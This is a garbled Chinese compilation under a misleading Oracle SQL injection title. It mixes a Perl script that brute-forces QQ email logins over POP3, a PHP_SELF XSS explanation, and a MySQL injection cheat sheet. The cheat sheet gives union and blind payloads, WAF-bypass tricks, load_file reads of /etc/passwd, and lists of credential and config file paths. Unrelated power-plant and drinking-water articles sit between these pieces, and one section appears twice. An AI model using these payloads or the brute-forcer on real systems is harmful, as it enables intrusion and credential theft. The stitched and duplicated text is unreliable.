Oracle SQL Injection Cheat Sheet脚本安全

2024-08-15

Oracle SQL Injection Cheat Sheet脚本安全(精选10篇)

Oracle SQL Injection Cheat Sheet脚本安全 篇1

use Net::POP3;

$email=“pop.qq.com”;

$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. ”);

print $pop->banner;

$pop->quit;

$i=0;

open(fp1,“user.txt”);

@array1=;

open(fp2,“pass.txt”);

@array2=;

foreach $a(@array1) {

$u=substr($a,0,length($a)-1);

$u=$u.“@qq.com”;

foreach $b(@array2) {

$p=substr($b,0,length($b)-1);

print “cracked with ”.$u.“-----”.$p.“ ”;

$i=$i+1;

$pop = Net::POP3->new($email)or die(“ERROR: Unable to initiate. ”);

$m=$pop->login($u,$p);

if($m>0)

{

print $u.“------------”.$p.“----”.“success”.“ ”;

$pop->quit;

}

else

{

print $u.“------------”.$p.“----”.“failed”.“ ”;

$pop->quit;

}

}

}

用安全扩展拦截无用的脚本 篇2

安装相应的安全扩展

既然我们提到了安全扩展,那么我们就首先来安装它。这里以火狐浏览器为例,首先点击“工具”菜单中的“附加组件”命令,在弹出网页的搜索框里面输入“NoScript”查找,找到以后根据提示安装并重新启动浏览器即可(如图1)。如果用户认真观察的话,会发现火狐的扩展页面中,也在推荐这款安全扩展。

当这款NoScript扩展正常运行的时候,就会在浏览器的工具条上显示出这个NoScript扩展的图标。当然如果用户使用的是谷歌浏览器,或者由Chromium衍生出的其他浏览器的话,那么可以在谷歌的应用市场安装一款名为ScripSafe的扩展,同样也可以起到一样的脚本拦截效果。

利用白名单分析判断

我们常见的那些安全软件,通常情况下都是通过黑名单或者病毒库,对网页里面的脚本代码分析判断的。而NoScript扩展正好是反其道而行之,利用白名单来分析判断的。所以在我们访问任何一个网站页面的时候,NoScript扩展就会自动将网页中的所有脚本代码拦截,并且在浏览器窗口的下方通过提示条显示出拦截的脚本代码信息,这样恶意的脚本代码自然而然的不能运行操作了。

但是如果全面禁止所有的脚本代码,那么有的功能将无法正常地运行,比如搜索引擎的查找、视频信息的加载等。所以对于网站必要的脚本代码,我们还是需要允许它运行的,这时就需要使用到白名单。白名单的添加有两种方式,最简单的方法就是导入他人制作的白名单。比如我们首先从知名的安全论坛卡饭下载网友制作的白名单,接着点击窗口下方的NoScript扩展图标。在弹出的菜单里面选择“选项”命令,然后在弹出的对话框里面选择“白名单”标签。点击下面的“导入”按钮,选择刚刚下载的网友制作的白名单文件导入即可(如图2)。这样以后当浏览到白名单中的网站的时候,就会自动放行其中的脚本代码的运行。

自定义添加新白名单

虽然通过白名单可以对一些网站的脚本代码放行,但是并不是我们自己使用的所有网站都可以,所以有的时候我们还需要自己自定义添加一些白名单。这里我们就以新浪视频为例为大家进行介绍。当我们通过火狐浏览器打开访问新浪视频后,照样会在下方显示出被拦截的脚本代码。现在点击浏览器中的NoScript扩展图标,在弹出的菜单里面可以看到调用这些脚本的网页链接。

Oracle SQL Injection Cheat Sheet脚本安全 篇3

针对$SERVER[’PHPSELF’]的跨站脚本攻击脚本安全

。今天偶然读到的XSS Woes,就详细讲述了和$_SERVER[’PHP_SELF’]相关的一个危险漏洞。

$_SERVER[’PHP_SELF’]在开发的时候常会用到,一般用来引用当前网页地址,并且它是系统自动生成的全局变量,也会有什么问题么?让我们先看看下面的代码吧:

以下是引用片段:

这段代码非常简单,我们想用$_SERVER[’PHP_SELF’]来让网页提交时提交到它自己,假设代码文件名为test.php,在执行的时候就一定会得到我们期望的地址么?首先试试地址…/test.php,结果当然是没有问题的啦,别着急,你再访问一下…/test.php/a=1,将会得到如下客户端代码:

以下是引用片段:

显然,这已经超出了我们的期望,web服务器居然没有产生诸如404之类的错误,页面正常执行了,并且在生成的html代码中居然有用户可以输入的部分,恐怖的地方就在这里。别小看那个“a=1”,如果把它换成一段js代码,就显得更危险了,比如这么调用:

…/test.php/%22%3E%3Cscript%3Ealert(’xss’)%3C/script%3E%3Cfoo是不是看到了js的alert函数执行的效果?检查一下生成的html源代码找找原因吧。

通过这种嵌入js代码的方式,攻击者能蚧竦512~4k的代码空间,甚至还可以连接外部网站的js代码或者通过image调用来伪装js代码的方式,那样 js代码的长度就不受限制了,然后通过js,他们可以轻松的获取用户的cookie,或者更改当前页面的任何内容,比如更改表单提交的目的地,更改显示的内容(比如给一个链接地址增加一个onclick=…的属性,这样用户点击的时候就会执行攻击者指定的代码,甚至连接到并非此链接地址本身的网站),甚至作出一个ajax效果来也不一定,总之,不要忽视js的威力。

那么,再来看看这个漏洞产生的原理,首先test.php/….这种调用是web服务器允许的,很多cms系统,比如我以前用过的plog,好像也是采用这种方式,在服务器不支持rewrite的情况下实现诸如http: //…/index.php/archive/999这样的固定网址的(我以前还以为是对404错误页下的手),所以带“/”的地址无法从web服务器上禁止,

然后再看看php中对$_SERVER[’PHP_SELF’]的识别,他就是一个包含当前网址值的全局变量,天知道用户会输入什么样的网站,在上面的例子中是恶意的,可是在 这样的网站上,却又是可以正常使用这种方式的地址的。所以,最终的结论要落在开发人员身上了,没有很好的处理与用户交互的数据。

从安全角度来讲,在开发应用尤其是web应用的时候,所有用户提交的数据都是不安全的,这是基本原则,所以我们才不厌其烦的又是客户端验证又是服务端验证。从上面说的这个安全漏洞来讲,不安全的内容中又要增加“网址”一条了。要解决$_SERVER [’PHP_SELF’]的安全隐患,主要有以下2种方式:

1、htmlentities

用htmlentities($_SERVER [’PHP_SELF’])来替代简单的$_SERVER[’PHP_SELF’],这样即使网址中包含恶意代码,也会被“转换”为用于显示的html代码,而不是被直接嵌入html代码中执行,简单一点说,就是“<”会变成“<”,变成无害的了。

2、REQUEST_URI

用$_SERVER[’REQUEST_URI’]来替代$_SERVER[’PHP_SELF’],在phpinfo中可以看到这两个变量的区别:

_SERVER[”REQUEST_URI”] /fwolf/temp/test.php/%22%3E%3Cscript%3Ealert(’xss’)%3C/script%3E%3Cfoo

_SERVER[”PHP_SELF”] /fwolf/temp/test.php/”>

$_SERVER [’REQUEST_URI’]会原封不动的反映网址本身,网址中如果有%3C,那么你得到的也将会是%3C,而$_SERVER [’PHP_SELF’]会对网址进行一次urldecode操作,网址中的%3C将会变成字符“<”,所以就产生了漏洞。需要注意的是,在很多情况下,浏览器会对用户输入要提交给web服务器的内容进行encode,然后服务器端程序会自动进行decode,得到相应的原指,在我们进行post或者get操作的时候都是这样。

Oracle SQL Injection Cheat Sheet脚本安全 篇4

伊敏电厂外包工程管理

壮大中的伊敏电厂

在美丽的呼伦贝尔大草原深处,有一座美丽的小镇,那里山清水秀,河水富饶,有着丰富的地产资源,坐落着全国第一家煤电联营大型能源企业—华能伊敏煤电有限责任公司。伊敏电厂是华能伊敏煤电有限责任公司的下属企业,地处高原、高寒、高纬度地区,是典型的与煤矿煤水灰紧密联系的坑口电厂,具有着得天独厚的发展优势,现有一期、二期、三期工程共六台机组,装机容量3400MW。伊敏电厂在伊敏煤电公司的直接领导下,秉承“三色”文化精神,坚持积极进取,创造业绩,服务国家的原则,不断发展壮大,已经成为东北电网中火力发电厂总排名第二的能源企业,强化红线意识,落实责任狠抓外包工程安全管理工作

大家现在看到如火如荼的施工现场,就是伊敏电厂一期机组的环保一体化改造工程,承担这次技术改造任务的有中国能建集团安徽电建一公司、中国能建集团黑龙江火电三公司、吉林安装集团公司、东北电业管理局第三工程公司以及东北电业管理局烟塔公司,工程外包总施工人数首次超过伊敏电厂员工总人数,达到1600人,可以说,这是伊敏电厂投产以来最大的技改工程,也是外来施工人员最多的一年。如何管理好外包工程,确保外来人员施工安全,成为伊敏电厂2014年安全管理的工作重点。

伊敏电厂按照集团公司《关于进一步加强电力生产外包工程安全管理的通知》和《中国华能集团公司电力企业生产发承包工程安全管理办法》要求,结合公司“外包工程安全专项整治年”活动的有效开展,树立“以人为本”、“工程外委、责任不外委”的安全理念,强化红线意识,以责任制落实为核心,以现场风险管控为主线,以建立健全外包工程安全管理长效机制为目标,整合外包队伍、整合外包工程,提高外包队伍自主安全管理水平,有效控制安全风险,确保外包工程安全。

2014年初伊敏电厂召开外委队伍安全会议,与17个外委队伍签定了安全生产协议,明确各方安全管理责任,确定外委工程项目负责人、电厂甲方联系人,并对相应的职责做出明确要求,落实各项安全管理措施。

针对伊敏电厂环保改造项目工程,伊敏电厂成立了以副总工程师端木昭勇为负责人,由相应的专业人员、安全管理人员组成的环保改造项目部负责环保改造工程的设计、招标、施工、调试等全过程管理,制定了相应的管理制度,并对整个工程的安全管理负责,监督现场安全施工过程,每季度召开项目部安委会会议,传达上级公司安全精神,协调解工程施工过程中存在的问题与困难,每周召开安全专题会,对违章行为进行考核通报,落实隐患的整改措施。

第三场:以“现场风险管控”为主线,严抓现场安全管理。为了进一步强化外包人员的安全意识,安监科增设了检修现场违章曝光版,把现场出现的典型违章行为拍成照片,用最直接的图片告诉员工哪些是违章行为,可能导致的后果以及被考核的队伍、人员,起到了较好的放大教育效果的作用;对于重大、复杂、危险、交叉作业的施工,在合同中明确要求施工单位上报“重大施工作业安全技术方案”,外包单位组织专业人员根据施工现场的实际情况,编制施工方案,并经过外包单位内部审核批准后,报给甲方管理责任部门,由甲方管辖部门审查施工单位的各项安全措施,确认与生产设施的有效隔离,配合施工单位做好安全技术措施,在有可能发生火灾、爆炸、触电、高处坠落、中毒窒息、机械伤害等事故的场所作业,制订专门的安全措施,经逐级审核批准后,并报给上级公司及监理部门备案,方可开工。对与厂内设备有接口的施工现场,电厂相应的管理部门设专人24小时不间断监督,从人员配置、安全措施、施工方案、作业环境、工器具的正确使用等方面,进行全方位的监督检查,协调解决现场施工的问题,为安全的完成施工任务、提供了有力的安全保障。第四场:用管理体系标准来规范外包工程安全管理工作 在《外包工程安全管理标准》管理内容中对外包队伍的资质、安全协议、安全保障金、安全技术措施、安全培训、安全交底等内容进行了明确的要求,对各部门的管理职责进行明确,对管理流程进行了规范,外包队伍可以根据管理标准要求,结合他们工程特点,编写相应的管理制度并进行管理。

在《反违章管理标准》中列出违章行为名细,针对不同违章性质进行不同考核,规定外委单位厂内作业违章进行扣分累计管理,当累计到不同的分值时,对外包队伍全体停工到安监科进行1—3天的安全培训,累计扣分达到70分时,此外委队伍清除伊敏电厂,提高了外委队伍的违章成本,从而有效约束了外委队伍员工现场作业的不安全行为的发生,降低了安全风险。在行政楼的五楼,设有伊敏电厂安全培训室,利用安全教育培训系统和自行制作的培训课件对外来人员进行培训,除我厂基本生产知识、安全知识外,课件内还收录了一些违章事故现场的图片资料,配上安全管理人员的讲解、解说,加深了外委人员对违章现象的认识,取得了良好的培训效果。对外委违章人员实行违章清退永不录用,并记录在黑名单中,黑名单在全公司范围内进行公布,在安全培训室、生产现场张贴了外委清退人员黑名单,有效地震慑了各种违章行为.用“四个一样”的管理模式提升外委队伍的管理

为加强外包队伍的管理规范化,使外包单位在伊敏电厂能够有归属感,更好的服务于伊敏电厂,电厂投入部分资金,为常驻外委单位设立专门的办公场所,配备办公用品,为外委单位创造整洁舒适的办公环境。同时,外包队伍通过局域网,能够看到电厂的各种管理信息,随时查阅电厂各项管理标准,并通过网络进行工作票办理。

为进一步提升外委班组管理水平,电厂组织驻外包班组负责人,参加班组班前、班后会及安全活动,学习会议流程、工作方式方法。通过听和看,汲取经验,掌握和积累了一定的班组管理经验,为外委班组有序开展好班组工作,提升班组管理水平提供了有力支持,外委班组的日常班务管理逐步达到厂内的班组的管理水平。

根据公司外包管理的“四个一样”要求,即对承包单位的要求与对内部部门的要求一样、对承包单位的管理与对内部部门的管理一样、对承包单位员工的要求与对自己员工的要求一样、对承包单位员工的管理与对自己员工的管理一样,伊敏电厂对常驻外委班组设立专人负责日常管理,对临时外包工程由甲方联系人实时跟踪现场管理,为方便外委人员的工作,制定外委安全管理工作流程图,建立相应的资料室存放外委资料,在规范管理的同时,也为外委管理创造条件。

在外包工程交流会上,伊敏电厂厂长郑安这样说:

饮水安全电视宣传片脚本 篇5

——平原县饮水安全工程建设概述

平原县位于德州市中部,潘庄引黄灌区的上游,辖7镇3乡、2个办事处、1个开发区,880个行政村,农村人口37.3万人。传统饮水方式是以地下水为水源,分散提水,由于我县特殊的地理构造,浅层水苦咸、易受污染,深层水高氟,广大农民群众一直为缺水、喝苦咸水、高氟水所困挠,给农民生活带来安全隐患,根据2006年全县水质普查,全县提取的 份地下水样的化验分析显示,对照农村实施《生活饮用水卫生标准》准则,全县农村不安全饮水人口达 万人,占全县总人口的 %。全县广大农村因饮用水水质不合格引发的氟斑牙、氟骨症、胆结石、心脑血管等各种疾病患者达 人,农村饮水不安全状况十分严峻,严重影响了社会的稳定和农村经济的发展,广大农民群众对早日喝上甘甜、卫生的自来水期盼已久。

“民以食为天,食以水为先”。平原县县委、县政府在发展经济的同时,坚持以人为本,努力改善和提高人民群众生活水平和生活质量,把民生水利放在更加突出的位置,特别是直接关系到广大人民群众身体健康的农村饮水安全问题,连续五年将其列为为民办实事重要内容。我县自2008年实施饮水安全工程以来,在省市领导和上级业务部门的关怀下,在市委、市政府的正确领导下,按照上级的统一规划部署,各项工作有序展开,工程建设稳步推进。

“昔日吃水真发愁,如今自来水到灶头,民心工程政策好,幸福生活在后头。”村民们自编的顺口溜,勾勒出了农村饮水安全工程建设的喜人成就。截止2012年 11月底,我县在全市率先完成了饮水安全整建制一体化,提前一年完成了市委、市政府提出的“到2013年底在全市整建制实现城乡供水一体化”目标,实现了“城乡供水一体化”。累计完成投资5072万元,惠及全县13个乡镇,593个村,20.5万人。使他们摆脱了高氟水、苦咸水的历史,把党和政府的关怀送到农民的心坎上。

饮水安全工程运行以来,各项制度落实到位,管理状况良好,确保了工程长效运行,群众长期得到实惠,村民们都购置了洗衣机,安装了太阳能、热水器,呈现出“环境优美、乡风文明、社会稳定”的和谐局面,被群众誉为“德政工程”、“民心工程”。为切实抓好这一关系千家万户的民生工程,县委、县政府从改善民生出发,高度重视饮水安全工程建设,成立由县长为组长的工程建设领导小组,县水务局和全县13个乡镇(街区)由一把手挂帅成立了相应的领导机构,平原县人民政府以平政发【2012】10号文出台了《关于加快推进农村饮水安全工程建设工作的通知》,进一步强化组织领导。县委专门召开常委专题会议,县领导小组定期调度工程建设情况,研究部署工程建设工作任务。

县水务局在县委、县政府的领导下,根据国家关于饮水安全工作的指导精神,结合我县实际,努力探索先进技术,积极争取资金,形成了一条适合我县饮水安全的工作思路:以相家河水库为水源,利用已建成的城区水厂、恩城水厂和张官店水厂供水工

程,使自来水管网覆盖全县,实行规模化集中供水。

在农村饮水安全工程建设过程中,坚持高起点规划、高标准建设,按照“政府投一块,受益群众集一块,多方筹措一块”的原则,多渠道、多层次、多元化的筹措资金;坚持阳光操作,加强建后管理;坚持水质保护,加强宣传引导。从规划、实施到管理,大力推广应用高新环保材料和工艺,确保建成的供水工程为受益群众提供源源不断的洁净水源。工程项目规范运行,一律上墙上榜,接受群众监督。加强工程建设,严格落实项目法人、招标投标、工程监理、质量监督等四项制度,加强对关键环节的监管,严格实行“五个统一,即:统一规划设计,统一建设程序和施工技术标准,统一购置管材、管件及水表,统一监督工程质量,统一竣工验收,确保工程优质高效。出台严格的饮用水水源保护制度,强化水质监测和治理,从源头治理水源污染,确保水源安全。同时,大力开展宣传培训,发放《农村饮水安全手册》等宣传读本、画册,制作播放安全饮水电视讲座专题片,普及农村饮水安全知识,引导群众参与工程建设和管理,营造全社会关心支持农村饮水安全工作的浓厚氛围。

建设是基础,管理是关键。在饮水安全工作中,高度重视建后管理工作,把工程管理作为一项大事来抓,积极创新供水管理机制,确保工程长效运行。一是实行水务一体化。2011年 月份,平原县供水公司划归我县水务局统一管理,实现了水务一体化,促进了城乡供水一体化,确保了水质、水量、方便程度和保证率等国家指标统一管理和全面落实,促进了饮水安全一体化的发展

进程。二是成立了专管机构。成立了平原县农村公共供水管理办公室,负责研究制定供水工程管理规章制度,指导和监督全县供水工作,实行集中统一管理。按照市场运行机制,明晰权责,在各水厂成立供水公司,使供水工作企业化发展、市场化运作。目前,三个水厂均采取了企业化经营管理,效果良好。三是建立专业化管理队伍。供水工程管理的专业化要求很高,对设备、运行、水质处理和监测等都有很强的专业要求,对所有管理人员进行了培训,由专门管理知识和技能的人员作为管理主体组成管理团队,建立健全各种规章制度,做到管理专业化、服务社会化、工作规范化,实现农村供水工程高水平、专业化管理。同时,为保证工程长久发挥效应,我们还分别在各个水厂成立了“饮水安全工程维修服务队”,配备车辆、维修工具,对外公布24小时故障报修电话,及时解决各种供水故障,确保群众用水及时。

字符编码钓鱼的利用脚本安全 篇6

字符编码钓鱼的利用脚本安全

链接中的Url地址可以通过不同编码将字符形似的域名指向另一个地址:如ɴuanyue.com地址,点击后实际指向的地址是:www.xn--uanyue-93c.com/,恶意攻击者可通过注册这样的域名,利用错觉达到钓鱼的目的,请注意复制和点击的链接。

Oracle SQL Injection Cheat Sheet脚本安全 篇7

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其

中记录了Mysql中所有

存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说

明。

1.得到所有数据库名:

|SCHEMATA ->存储数据库名的表

|—字段:SCHEMA_NAME ->数据库名称

|TABLES ->存储表名

|—字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名

|—字段:TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表

|—字段:TABLE_SCHEMA ->该字段所属数据库名

|—字段:TABLE_NAME ->存储所属表的名称

|—字段:COLUMN_NAME ->该字段的名称

#########################################################################

##

0×001 获取系统信息:

union select 1,2,3,4,5,concat

(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user

,0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*

@@global.version_compile_os 获取系统版本

@@datadir 数据库路径

database() 当前数据库名称

0x3c62723e 换行HEX值

*/

######################################################################

0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from

information_schema.tables where table_schema=0x67617264656e /*

/*

0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

######################################################################

0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from

information_schema.columns where table_name=0x61646d696e and

table_schema=0x67617264656e limit 1 /*

/*

group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段

0x61646d696e ->选择一个表

0x67617264656e ->数据库名

*/

#####################################################################

0×004 获取数据

union select 1,2,3

,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat

(adpassword),6,7,8 from admin

/*

0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据

*/

顺便添加一些mysql注入时非常有用的一些东西

简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名

2:user()用户名

3:current_user()当前用户名

4:session_user()连接数据库的用户名

5:database()数据库名

6:version()MYSQL数据库版本

7:load_file()MYSQL读取本地文件的函数

8:@@datadir读取数据库路径

9:@@basedirMYSQL 安装路径

10:@@version_compile_os操作系统Windows Server ,

收集的一些路径:

WINDOWS下:

c:/boot.ini//查看系统版本

c:/windows/php.ini//php配置信息

c:/windows/my.ini//MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码

c:/winnt/php.ini

c:/winnt/my.ini

c:mysqldatamysqluser.MYD//存储了mysql.user表中的数据库连接密码

c:Program FilesRhinoSoft.comServ-UServUDaemon.ini//存储了虚拟主机网站路径和密码

c:Program FilesServ-UServUDaemon.ini

c:windowssystem32inetsrvMetaBase.xml//IIS配置文件

c:windows epairsam//存储了WINDOWS系统初次安装的密码

c:Program Files Serv-UServUAdmin.exe//6.0版本以前的serv-u管理员密码存储于此

c:Program FilesRhinoSoft.comServUDaemon.exe

C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere*.cif文件

//存储了pcAnywhere的登陆密码

c:Program FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf //查看WINDOWS系统apache文件

c:/Resin-3.0.14/conf/resin.conf//查看jsp开发的网站 resin文件配置信息.

c:/Resin/conf/resin.conf/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

d:APACHEApache2confhttpd.conf

C:Program Filesmysqlmy.ini

c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置

C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件

/usr/local/apache2/conf/httpd.conf

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/usr/local/app/php5/lib/php.ini //PHP相关设置

/etc/sysconfig/iptables //从中得到防火墙规则策略

/etc/httpd/conf/httpd.conf // apache配置文件

/etc/rsyncd.conf //同步程序配置文件

/etc/my.cnf //mysql的配置文件

/etc/redhat-release //系统版本

/etc/issue

/etc/issue.net

/usr/local/app/php5/lib/php.ini //PHP相关设置

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/sysconfig/iptables 查看防火墙策略

load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

replace(load_file(0x2F6574632F706173737764),0x3c,0×20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

Oracle SQL Injection Cheat Sheet脚本安全 篇8

结果被脑残反问还有什么方法,的确有些时候思维被固化了,很多东西需要变通。

php+mysql

首先说判断:

Null值相信大家不陌生吧,可这么用: and 1 is null,and 1 is not null

或: and 2<=3

其实,很多人习惯性的用=号来判断了,但是,如: >= ,<= ,is null,is not null,等 都可用于判断

接着说注入

对于注射取值,我们熟悉的就是union select 和 blind sqlinjection(盲注)

先说Union Select

对于常规的注射,我们可以union select 1,2,3,4 或 union/**/select/**/ 1,2,3,4

Ok,看我演示, id=1+u/**/nio/**/n+se/**/lect+1&id=2,3&id=4 够恶心吧?

可绕过国内所有防注射哦:) 这代码运行后效果如上,至于原理我希望大家自己去

查查相关资料,有异议的可给我留言.

当然,在语句传递多个参数时 例如 slect * from table where id = 1 and name = xxx ,我们可这么做:

id=1+union/*&name=*/select+1,2

代入查询后 slect * from table where id = 1 union /* and name = xxx */ select 1,2

这是一种让常量(变量)失效的技巧,当然,环境要求比较苛刻

下面说说Blind SqlIjection(盲注)

一般方式,我想大家应该是这么做的: ascii(substring(password,1,1))=56,或者是

ord(mid(password,1,1))=56

在此,我推荐大家还是用子查询,当然,前提是猜出表,字段,可更为准确的得到想得到的数据

此前,仍然向大家推荐一些新型的手法:

find_in_set 例: find_in_set(’56′,ascii(substr(password,1,1)))=1

strcmp 例: strcmp(left(‘password’,1), 0×56) = 1

将这些函数套如子查询就是:

id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×55)=1 false

id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×56)=0 true

id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×57)=-1 false

老外NB 方法 还有 -.-

悲剧还是绕不过去,nnd。要是国内

的站以上几种方法一般都能搞定,老外就是bt。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高

www.xxx.com/index.php?content=more_product&id=-17 and (select 1)=(select

0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6–+-

www.xxx.com/index.php?content=more_product&id=-17 and (select 1)=(select

0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version,database(),u

Oracle SQL Injection Cheat Sheet脚本安全 篇9

结果被脑残反问还有什么方法,的确有些时候思维被固化了,很多东西需要变通。

php+mysql

首先说判断:

Null值相信大家不陌生吧,可这么用: and 1 is null,and 1 is not null

或: and 2<=3

其实,很多人习惯性的用=号来判断了,但是,如: >= ,<= ,is null,is not null,等 都可用于判断

接着说注入

对于注射取值,我们熟悉的就是union select 和 blind sqlinjection(盲注)

先说Union Select

对于常规的注射,我们可以union select 1,2,3,4 或 union/**/select/**/ 1,2,3,4

Ok,看我演示, id=1+u/**/nio/**/n+se/**/lect+1&id=2,3&id=4 够恶心吧?

可绕过国内所有防注射哦:) 这代码运行后效果如上,至于原理我希望大家自己去

查查相关资料,有异议的可给我留言.

当然,在语句传递多个参数时 例如 slect * from table where id = 1 and name = xxx ,我们可这么做:

id=1+union/*&name=*/select+1,2

代入查询后 slect * from table where id = 1 union /* and name = xxx */ select 1,2

这是一种让常量(变量)失效的技巧,当然,环境要求比较苛刻

下面说说Blind SqlIjection(盲注)

一般方式,我想大家应该是这么做的: ascii(substring(password,1,1))=56,或者是

ord(mid(password,1,1))=56

在此,我推荐大家还是用子查询,当然,前提是猜出表,字段,可更为准确的得到想得到的数据

此前,仍然向大家推荐一些新型的手法:

find_in_set 例: find_in_set(’56′,ascii(substr(password,1,1)))=1

strcmp 例: strcmp(left(‘password’,1), 0×56) = 1

将这些函数套如子查询就是:

id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×55)=1 false

id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×56)=0 true

id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×57)=-1 false

老外NB 方法 还有 -.-

悲剧还是绕不过去,nnd。要是国内

的站以上几种方法一般都能搞定,老外就是bt。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高

www.xxx.com/index.php?content=more_product&id=-17 and (select 1)=(select

0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

